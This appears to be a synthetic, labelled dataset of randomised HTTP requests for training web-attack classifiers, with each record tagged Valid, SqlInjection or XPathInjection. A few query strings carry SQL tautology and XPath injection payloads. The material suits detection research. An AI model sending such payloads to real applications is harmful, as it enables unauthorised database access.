Cookie2: $Version="43"
Date: Fri, 05 Mar 10 13:41:32 GMT
ETag: "7ly7eaghEhD_adE97d"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 19 Mar 05 06:47:43 CET
If-Unmodified-Since: Sun, 26 Nov 06 12:59:42 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 10
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: percek tmt6ono=eltjn
Range: -924,18744-98395
Referer: /ufcisod.php
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 6.2; 0a-mt; rv:0.6.4) Gecko/74320684
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 767x833
Via: 4.9 202.199.165.191
Transfer-Encoding: deflate
Upgrade: codse/2.4, Orte/3.9, dttr/7.6, cTjdn/1.0, iaatOs/2.1
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 4331077002
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21624
Start - Id: 5162
class: Valid
PUT /atreedthavsiyf3i/ecuEIr/vewieynssac/o1t4mc9aprqo7/iUc457/4oote/dC4/b7qe/CQ.admin@Leval/-@jCW.gif? HTTP/1.0
Content-Length: 120
Content-Language: iwsesh
Content-Encoding: identity
Content-Location: http://www.oscet0v.biz/rp9nnhoh/h4shEi/Myshuo.msf
Content-MD5: ZTVwZkV0aGN1cGw2YVRTbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Oct 05 13:17:01 GMT
Last-Modified: Wed, 18 Jun 08 17:45:07 CET
Host: 12.85.28.76
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: atge-lt8Yhsot
Cache-Control: max-stale=61
Client-ip: 143.160.182.28
Cookie: 9sn6aeou=ew3J7AGs
Cookie2: $Version="249"
Date: Thu, 07 Apr 05 01:35:46 UTC
ETag: "HXV-XGaB__.IBBzhCL"
Expect: ERopy
From: sttS3e@cNouiuhrt.it
If-Modified-Since: Sat, 07 Jul 07 13:35:25 CET
If-Unmodified-Since: Mon, 27 Apr 09 10:55:26 UTC
If-Match: "MZfnnsYzezxrffWjiZC9"
If-None-Match: "wnq2s4bsFZKuvO1"
If-Range: Sat, 31 Dec 05 23:25:14 GMT
Max-Forwards: 7401
MIME-Version: 5.5
Pragma: t3Itnodk='aEOar'
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: ne5i eEta=tiiWu
Range: 487-
Referer: /Olribamn/trqeo3/dcsivFf.rar
TE: trailers,deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: s7gc2heHv6gxnanuIah
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1638x365
Via: FTP/0.1 www.lEftaet2.shtml, FTP/0.1 116.253.154.114
Transfer-Encoding: identity
Upgrade: t9eB/4.7
Warning: 205 www.od5f.html "wlyis6aewo" "Wed, 10 Oct 07 03:40:22 CET"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CIpYGexec_hs=miaDhohizwnl&n7ome=atepincgedn\e w&iLhpnoe=6g@r2pusr&4r4nvs=l30nperl9aat&tsrazlNngrmeje=9Aja&cbKRA6Vs=6

End - Id: 5162
Start - Id: 28967
class: Valid
GET /HklSTL_access_logHiu0Km2/xX/5vpxN3pZNExYw9Dz6joB/p53tx135/aV1.nsf? HTTP/1.1
Host: www.hs3bgn.net
Connection: keep-alive
Accept: image/*, image/*, application/zip;q=0.9
Accept-Charset: x-mac-arabic;q=0.1, x-mac-chinesesimp, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: 5o4cr-c
Cache-Control: no-store
Client-ip: 78.125.221.48
Cookie: tTmhlnUe3tsSQ=oNi6zeh1tl8
Cookie2: $Version="25"
Date: Wed, 18 Apr 07 16:59:17 CET
ETag: "c@pgoWBUVAcyIbxUaDrk"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Wed, 08 Sep 04 05:12:56 CET
If-Unmodified-Since: Sat, 08 Aug 09 24:40:37 CET
If-Match: *
If-None-Match: "DAVrSa_tCv_AzhAYg"
If-Range: Wed, 13 Sep 06 06:47:53 UTC
Max-Forwards: 300
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: praomc eFi7othH=broeRu
Range: -332385,-432,1995-63
Referer: http://otmiRub.biz/een92/Gelqw.php4
TE: gzip;q=0.2,gzip;q=0.9
Trailer: From
User-Agent: r26mDiR http://www.rsceas.be
UA-CPU: Sparc
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: oeeS/5.9 www.uiloh.gif
Transfer-Encoding: identity
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 622 www.erT4em.shtml "zeneZqE" "Fri, 30 Nov 07 09:52:02 GMT"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28967
Start - Id: 49955
class: XPathInjection
GET /crueecysea/Wp.css?73LZ0AFI=9769003&nlehaycfr=nsni%3Dnetsjopenall&sRtsqozmep2c=276240&rZOtnoioR=mshnk%27ra&enG=scusc&_2eP0yJps2f@=NevfmaTda5ma&lia02ee=751092&1oi=esSq%297q&ohae=rgusb%27%5D++++%7C+++++P+%7C++%2F%2Fuser%5B+++name%2Ftext%28+++%29++%3D+++%27rsa&tg2oeOT=hhmLefa&yesrmqonp1=nqn4Fwn&rpsNnb2to97md=76258797&8o70u=4pUlSye HTTP/1.0
Host: www.lsor9el.be:17
Connection: ilayeN
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: xi-3c;q=0.3, mnrurs7d-00;q=0.9, loresero-fp5eAwa, vgzotetS-nmdw, too8t-ep9h
Cache-Control: e5eaw=la03rdlp
Client-ip: 6.57.199.123
Cookie: zi6ibT=91634;THLxtermyVxml=rBhTD3jadR;4e0see=aidahodhbItdobjectok;xzeo=6 4
Cookie2: $Version="9"
Date: Mon, 21 Jul 08 24:07:15 GMT
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Sun, 05 Feb 06 04:32:24 CET
If-Unmodified-Since: Mon, 07 Mar 05 10:51:09 CET
If-Match: "g2sH@cRsy4dKvnb_"
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Sun, 27 Jul 08 15:03:54 GMT
Max-Forwards: 6
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 88781-3
Referer: /Aohnng1/rvaew/nNayOhtg/hgidE/t3AeO.php3
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/1.4 (compatible; Konqueror/8.6; Solaris; atnazt7; rww8aIe; qyLsiym)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 207x5488
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49955
Start - Id: 21006
class: Valid
GET /eST5aueiaagouGhh/s9/selectUN/agrbeiakE/53CA-form/c3h7cic/esmysCFPMclays/iBipxIteZDQ1-bVrHlH/heWuEj2.cgi?Seoae2Ntag=9227069&PTGexec3HY_l=0171633557&Shhn=teuene5M HTTP/1.1
Host: www.7htIov93ex.net
Connection: ruse
Accept: audio/*, text/html;q=0.8, application/postscript
Accept-Charset: x-mac-turkish, iso-2022-kr
Accept-Encoding: 
Accept-Language: rtkom4t-ep4e;q=0.7, sd-dtyt
Cache-Control: no-store
Client-ip: 241.58.191.36
Cookie: 3ez=$access_logusrdocumentt;0itokarsonha=whn;htrj6Vtaam=2SFr;tugrsded9eI4uh9=|gnph-c2;xxceseeKneu7=bup
Cookie2: $Version="9"
Date: Tue, 22 Nov 05 19:00:36 UTC
ETag: "yS7jeWo.CP_ngWA"
Expect: 100-continue
From: sooel@tsc9yp.it
If-Modified-Since: Wed, 04 Feb 04 20:48:40 CET
If-Unmodified-Since: Sun, 18 Jul 04 20:34:50 UTC
If-Match: "46KX2u.BNfi0JlsPwkQj"
If-None-Match: "-jVTXlwhUNsDbkJME"
If-Range: "YW@xSHUimy189L_58"
Max-Forwards: 11
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest response="a0f19d231EFdE2b1dCCD9A5Daa596122"
Authorization: NTLM YWVlaWN4ZG9zMWFnZWF0dEdUaDczcGFmbmJzYWFycnpyZW4=
Range: 9864-14,-53
Referer: http://www.Iswcr.org/ejeed/bmot/af2tec/ofae4/irhu0c.js
TE: gzip;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 5.0; qf-hu; rv:9.6.3) Gecko/51897819
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: 1.2 www.tt3h.png, 4.1 www.peemcDni.png, eax/8.4 www.maLesO.html
Transfer-Encoding: gzip
Upgrade: inir/1.9, 5xetc/4.2, 9hdwag/8.3, hph/1.7
Warning: 969 2.97.52.123 "vehhjWg" 
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21006
Start - Id: 24123
class: Valid
GET /ed_WmVx7/c-IpS.dS8/goHgLCpPIBc.cfm? HTTP/1.0
Host: www.huisn.gov:124
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.9, iso-8859-6, windows-874;q=0.1, big5
Accept-Encoding: deflate, identity;q=0.8, deflate, compress;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=9
Client-ip: 161.43.125.4
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="0"
Date: Fri, 05 Oct 07 24:41:02 UTC
ETag: W/"39qvPoPy8Dc5qFUV-JsX"
Expect: 100-continue
From: ceeqii@htrq.biz
If-Modified-Since: Fri, 13 Feb 04 20:45:27 UTC
If-Unmodified-Since: Tue, 22 May 07 10:23:21 CET
If-Match: *
If-None-Match: "ked_XipZ9WbA7Z2yR"
If-Range: Tue, 25 May 04 14:18:02 GMT
Max-Forwards: 371
MIME-Version: 1.3
Pragma: e56i7='w2eolteo'
Proxy-Authorization: Digest nonce
Authorization: rephn 9uuqEn=draec
Range: -293,9-
Referer: http://a9emcn.biz/aiosnolu/cimc/etdlcd/iyme.msf
TE: deflate,deflate
Trailer: Trailer
User-Agent: lctbpr8/2.7
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: FTP/6.1 www.0ezmreet.shtml, HTTP/9.1 www.1exjtE.tiff, FTP/1.4 201.30.208.1
Transfer-Encoding: compress
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24123
Start - Id: 28525
class: Valid
GET /eja36AeAX_dm/lxSq_/qC0A6.php4?2berdta4fl8nrE=geO+d&tmf=12719 HTTP/1.0
Host: 26.132.48.160:13
Connection: keep-alive
Accept: application/*;q=0.2, image/png
Accept-Charset: x-mac-chinesesimp, x-mac-japanese
Accept-Encoding: *;q=0.3
Accept-Language: iI-he9yoe
Cache-Control: yraeen='ufa'
Client-ip: 86.240.167.85
Cookie: iUraen=70052828;csgitigizh=sdttae;et3sggcb6Un=rmlike 
Cookie2: $Version="202"
Date: Mon, 16 Nov 09 10:42:57 UTC
ETag: "gx11LCPRum@FcfXRIc"
Expect: ehGe=nuzcoon
From: oSchO@nretCorwsa.st
If-Modified-Since: Fri, 29 Dec 06 13:08:29 GMT
If-Unmodified-Since: Sun, 03 Jun 07 02:21:58 CET
If-Match: "7GXCfdph6dmrRCXsqSdG"
If-None-Match: "-3hZn8EzfXOPTOE@Em"
If-Range: Tue, 27 May 08 06:40:47 CET
Max-Forwards: 8
MIME-Version: 6.5
Pragma: arlocE='v9teef'
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: NTLM ZXN0NWF0YTF5emJSZGh5ZU5uNmRlZXduMWUyZmdhZWluOGh0ZHkycw==
Range: 7-93,534-66746
Referer: /klcb9/mta6Ueu/lpZee/ztzeann/8aao4.bin
TE: trailers
Trailer: Cache-Control
User-Agent: cakn2ah/0.2.7.4
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 3.8 www.J1m8.tiff
Transfer-Encoding: lRnjeN
Upgrade: ssc6/7.2
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28525
Start - Id: 26614
class: Valid
GET /akolr/n09g/ynjerwdjtlssdnm/edfaahag65a8NoAk/h3oy9oTrndfp1/tB@WF5n3nUTLt5n/oat.exe? HTTP/1.0
Host: 205.76.70.206
Connection: close
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aOcn-mnfi, sgtoeaev-Tgl8W, th-kptiawtu;q=0.2, rtzupo-hOa, t-ebaa;q=0.0
Cache-Control: max-age=9
Client-ip: 60.195.247.35
Cookie: xtssageashaiydA=46052976;Elhl=Ou5eglgTaouToue;neoaansi=herhdrtpuloet iframeautoexecw
Cookie2: $Version="901"
Date: Fri, 29 Dec 06 15:05:29 GMT
ETag: W/"ET8PB8@zCmfVZdsF8cA"
Expect: tntonh
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Fri, 14 Mar 08 09:46:49 UTC
If-Unmodified-Since: Mon, 01 Oct 07 09:38:04 UTC
If-Match: *
If-None-Match: "6HcP2eAiJJhu_rTBoMp."
If-Range: Tue, 08 Mar 05 23:11:36 CET
Max-Forwards: 6816
MIME-Version: 7.2
Pragma: po=i
Proxy-Authorization: nst3rN diaww=8qhti
Authorization: NTLM TzJiaEJhYVNlc2l2RTMxamxhaWltOWVsZ25laWVxc2VuYWU=
Range: 3-,788456-3,6670-026581
Referer: http://www.fotmtdt.ch/aeh8o/iRenhe/ijiaiayi/llmGc.sh
TE: chunked
Trailer: Accept-Encoding
User-Agent: 4ei7lldalP/5.2
UA-CPU: Sparc
UA-Disp: 3286,345,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: aeinl/9.3 127.98.187.197, FTP/2.4 www.RhnNi.tiff:7
Transfer-Encoding: vbtegI; meleq=xThhi
Upgrade: m8nn/6.2, dh8taa/7.5, 0vmmct/2.3, onl/6.9
Warning: 472 51.16.225.72 "ie2nQuyerrj" 
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26614
Start - Id: 7738
class: Valid
POST /rtayrHes/pXRQ/s0y@OYlfLHk7IG/risten5ear4/4lGrIuo/rwLBgjI5c.InS/gJV.O.jd/60evZnaccess_log6Zae/mhpaolafsilTtienLoo/05ekt0tRb4richeod.tiff? HTTP/1.1
Content-Length: 121
Content-Language: ksOrnh,ee2,ce
Content-Encoding: compress
Content-Location: /osbhapti/atCln.fgf
Content-MD5: b2VkcGlzZWluZXpuVGlzOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Jun 08 13:41:44 GMT
Last-Modified: Thu, 01 Jan 09 13:07:48 GMT
Host: www.djeqt.cz
Connection: ieR3ol
Accept: image/gif
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: deflate;q=0.4, compress;q=0.6, gzip;q=0.7, deflate
Accept-Language: *;q=0.5
Cache-Control: max-age=66724
Client-ip: 29.49.164.102
Cookie: 07ei4NEsweer=%ir;ngeEe=426131;unenSfh=roowherenftf
Cookie2: $Version="079"
Date: Tue, 22 Dec 09 15:50:52 CET
ETag: W/"cJRopOwGsPscqTVsl"
Expect: 100-continue
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Sat, 30 Jun 07 02:42:43 UTC
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "z2nh.NJvyiGlfzs"
If-None-Match: "zCQI6gAQF1GQ2w.vkkXK"
If-Range: Sat, 28 May 05 07:18:22 CET
Max-Forwards: 4711
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: eoutrw tsuei=nnwhoxhe
Range: 176685-
Referer: /evuy/p7toD/5nesn0o/auodsin.htm
TE: trailers,deflate;q=0.0
Trailer: Date
User-Agent: Mozilla/1.6 (Windows; U; Win98 4.9; lf-fo; rv:3.1.7) Gecko/88031766
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2582x953
Via: 3.7 www.s9bae.png, secmix/1.1 www.acb2ipt.jpeg:315
Transfer-Encoding: compress
Upgrade: kimait/9.7
Warning: 925 www.ArnRO2ae.jpeg "eivtXhtcr" "Fri, 15 Aug 08 14:56:05 UTC"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

tumxrih0huNe1=zfO6TyAKzi64&adE=oEOU&9Reaycetet=r&ftp@43H75TGR=6429&heehtpieylo=tlkYDR&TcjeDaeSoe=okcatr&Nte1=9284&ctww=97

End - Id: 7738
Start - Id: 42270
class: SqlInjection
GET /Tscniyw/access_logV-oE8/eC/teiI/1y4/otsbpSliAfTus/5Hy.egKuOFX9N_mV.sh?ioieuowt=npne&nsharmti=%7Co&ud1abtlraaeo=2707&kkl5ft0ip=%27+++OR+%270nz54a%27++%3D+N%27+ HTTP/1.1
Host: www.gbsntfsiom.fr:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: utf-7, koi8-r;q=0.2, iso-8859-5;q=0.3, iso-8859-15, iso-8859-15
Accept-Encoding: deflate, compress, compress;q=0.5
Accept-Language: rtsfn-nt1eee;q=0.0, hhpac-ldg4o0, t-DQ;q=0.5, 9enec-Si41;q=0.3, hoEbhgaa-r;q=0.1
Cache-Control: only-if-cached
Client-ip: 241.101.146.87
Cookie: WWo8dB=679719;7w4p7i4eu1=hic;oisie0otgisg=dis9tofeIheho;til
Cookie2: $Version="64"
Date: Sat, 25 Apr 09 12:29:10 CET
ETag: "cQI1KzijYNcy.dQfk"
Expect: sRremose
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 11 Apr 06 14:52:07 GMT
If-Unmodified-Since: Wed, 09 Jan 08 20:55:22 GMT
If-Match: *
If-None-Match: "il1.@MkBFhkiWavrJE"
If-Range: Sat, 20 Feb 10 10:26:49 UTC
Max-Forwards: 551
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic bGRoTGVncjpvamlu
Range: 996351-59792
Referer: http://www.shexc.be/easgnos.php4
TE: trailers,trailers,trailers
Trailer: From
User-Agent: stfieOi/6.0
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0775x379
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42270
Start - Id: 35356
class: SqlInjection
GET /PnK/tzf2rd_gHAW_1c.X/i33eil.3bFtGnVPvJ/seoaloi7io/rZflSTrAEMy99oXK3y.w/xreadac7yve58rd/eXoP7rB.O1yeV2/noceteeimeinlrectea/2I-vnodeZe19RG0TQr/frc87@ndtxUsSsECE74W/hEraoEUrjs.tiff?reuteswor=h%28saaSr%29l&qIesdtefteetnBl=73514116&LKhbn0kV=%3B&iaJielxitaoa=OR+%27anftnwn7%27++++%3D+++++%27Sim%27%2B%27ple%27&ayjkntCucdz=jnlsg&xIos2htpass=81 HTTP/1.1
Host: www.lLWz.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.5, identity, identity, compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: max-age=761
Client-ip: 122.232.49.16
Cookie: IStn8=DeraoYmIn
Cookie2: $Version="194"
Date: Mon, 12 Apr 10 02:37:45 GMT
ETag: "B6_UDH4KS-1i1Exc6"
Expect: aseUtnu
From: ruin@msg0oh.fr
If-Modified-Since: Wed, 26 Nov 08 24:37:08 UTC
If-Unmodified-Since: Fri, 20 Feb 09 23:21:24 CET
If-Match: *
If-None-Match: "LOA-8DnkoL54ny9"
If-Range: Sun, 26 Dec 04 21:08:28 CET
Max-Forwards: 937
MIME-Version: 6.8
Pragma: adKsk4s=p07o
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: hoszw 8terEet=a94t
Range: 1609-18413
Referer: http://onoydmo.st/pmgb/mnhrc/2mVl.mdb
TE: trailers,chunked;q=0.5
Trailer: Max-Forwards
User-Agent: wsir/4.5.9
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: srz/6.5 218.40.5.106:2835
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 688 243.43.80.92 "4Hronabesyesov3og" "Fri, 23 Jan 09 20:16:25 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35356
Start - Id: 73
class: Valid
GET /nco/oR.js?loy=txalliw+replacel&wan6Ms=0521487&copy-BxW4z46rm=fo%26positione%40Ydn%3Dtmpovar HTTP/1.1
Host: www.ttee.st
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: ssne0r-e641Rn7s;q=0.2
Cache-Control: max-age=72384
Client-ip: 91.171.86.36
Cookie: Or6oaae7aizea5=84151314
Cookie2: $Version="082"
Date: Thu, 02 Feb 06 11:11:04 UTC
ETag: W/"8WaPHksYP7X6FJt_"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Fri, 05 Feb 10 03:15:09 UTC
If-Unmodified-Since: Tue, 27 Jan 04 12:30:16 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Sep 08 23:22:46 CET
Max-Forwards: 5
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: pVlh asmms=iwoa
Authorization: NTLM bHNhYXRpczhwaGVsYWV4aXlqdG1lbnRvdThlbUVpb3Nvc2VzbHBicnJsaGU=
Range: 1364-
Referer: http://www.zhcea8is.net/7ianzab.gif
TE: chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/2.1 (Windows; U; Windows NT 7.3; 1i-wa; rv:7.7.4) Gecko/93203003
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: 4.8 www.wesaw.htm
Transfer-Encoding: compress
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 365994
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 73
Start - Id: 32852
class: Valid
PUT /L-C/47sf6ml5e/lysdt/oiRdy/eO3eems2ne86s0av/hwFsns/n.iDV84@6Ym/su54VIjf/39g/n0UhwAFscuLU3Hs11mA9/wi/rvZzN4tVNkx.png? HTTP/1.1
Content-Length: 242
Content-Language: h4uiLce,ZneIlown,R2Ey2c
Content-Encoding: identity
Content-Location: /yr3yg/tthdd/iwrasiem/aagsanur.rar
Content-MD5: bHR5YW95anVuMG50cmNvZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Aug 08 09:51:56 UTC
Last-Modified: Fri, 24 Jun 05 06:48:30 GMT
Host: 111.123.247.76
Connection: close
Accept: image/*;q=0.5, audio/*, application/zip;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.0, gzip, gzip, deflate;q=0.9, compress;q=0.1
Accept-Language: t-vu0, teoIi-wgcpalit;q=0.0, aa-daLtfgNi;q=0.6
Cache-Control: min-fresh=396
Client-ip: 50.137.205.249
Cookie: rna9ytkcUqwiqex=smtHsqo
Cookie2: $Version="26"
Date: Mon, 11 Sep 06 21:31:33 GMT
ETag: W/"UoPCeFepRdsCiMeJFW"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Mon, 12 Apr 10 01:28:17 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: "NDnVl0ROI8URR9lm"
If-None-Match: *
If-Range: *
Max-Forwards: 8044
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: NTLM bGVlSmZoYWluc25yaHNyMnNsNnRBdHJseGswbnVkNXlzZHRkb3ZhdWw=
Range: 2086-1,90-
Referer: http://decefiqd.de/ntecuN/uXrNesrt/N8ezmtbe/tpheap.asp
TE: chunked,trailers,trailers
Trailer: Warning
User-Agent: ssdnCyoigsphyhaTsai
UA-CPU: PowerPC
UA-Disp: 1358,6257,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: FTP/3.5 www.jqoe.html, tht/5.1 36.71.47.203, 3.6 www.nnrece.htm
Transfer-Encoding: eRra
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

apn4=kh%3A1&ennosfdi=8349941&VRk6RD6cis=e3aio8epese2dctEe&eeTqcai8O=%7Ce&ondp=slrae&ptOtts0fEy=fn%40+O&mectioDp=Uttcyeeeq4nsgnueee&a5eteeahn=tJfYW-e&VMG.=aEeo%24wIl&7rteou=25&CC3Nqwb=722&naAtar=5412&xf%u@5link2PKW=twgC58&zhcbTrwhtae=trso5ired

End - Id: 32852
Start - Id: 27145
class: Valid
GET /ejre2tokyx/etcOMVCTUMFoG7Bb/QU48X2replacebetween1/nJhAz5ts.aspx?n3Ansot66epdqm=bcln%2B&Sae2ahiohqtl=tQupD6&oe5lri1c5iae=tVel%7Etcsz%3Ber8&yrgjuere7ptot=oeo1tieoaaaplnLi&Uaga3oioi1ul=tposition6m%7CntFEeneQ3%40l&Toei=r9YDq7nq6HqI&j06laawf=rwe1%2F&d2Ishutdown5Zr77TX=2525&tgdmn=efbe&rlnuVlaal0s4=0&wgetmE.allqGHbS=%3Dninaroom HTTP/1.1
Host: www.a7pnpbe3.de
Connection: close
Accept: video/mpeg
Accept-Charset: utf-7;q=0.1, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=74903
Client-ip: 198.90.183.128
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="9"
Date: Mon, 06 Jun 05 02:53:55 CET
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Tue, 23 Sep 08 18:35:49 GMT
If-Unmodified-Since: Wed, 26 Mar 08 20:13:51 UTC
If-Match: "tTePC_n2GibXNaxxYTbW"
If-None-Match: *
If-Range: "C_NGDVAJloL6ey5p"
Max-Forwards: 91
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic NWFvbjpzbW5zcndC
Authorization: sIiuf tsou=cXeu
Range: 876-071,453044-67,-1
Referer: /e5ntNG.tar
TE: trailers
Trailer: Accept
